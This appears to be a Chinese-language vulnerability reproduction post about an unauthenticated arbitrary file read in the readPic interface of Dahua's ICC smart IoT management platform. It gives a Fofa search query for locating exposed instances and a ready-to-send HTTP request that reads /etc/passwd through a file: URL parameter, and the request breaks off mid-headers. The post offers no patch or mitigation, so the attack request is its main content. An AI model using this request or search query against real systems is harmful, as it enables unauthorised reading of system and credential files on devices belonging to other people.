简介
浙江大华技术股份有限公司,是全球领先的以视频为核心的智慧物联解决方案提供商和运营服务商。
漏洞简介
大华ICC智能物联综合管理平台 readpic接口处存在任意文件读取漏洞,未经身份验证的攻击者 可以获取系统内部敏感文件信息,使系统处于极不安全的状态。
影响版本
大华ICC智能物联综合管理平台
Fofa:
body="客户端会小于800"
漏洞复现
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/2
Host:
Cookie: JSESSIONID=B06F62DA10C57C736E21C01F63EE138F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate, br
User-Client: 1
Timeoffset: -28800000
Authorization:
Content-Type: application/json;charset=utf-8
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: c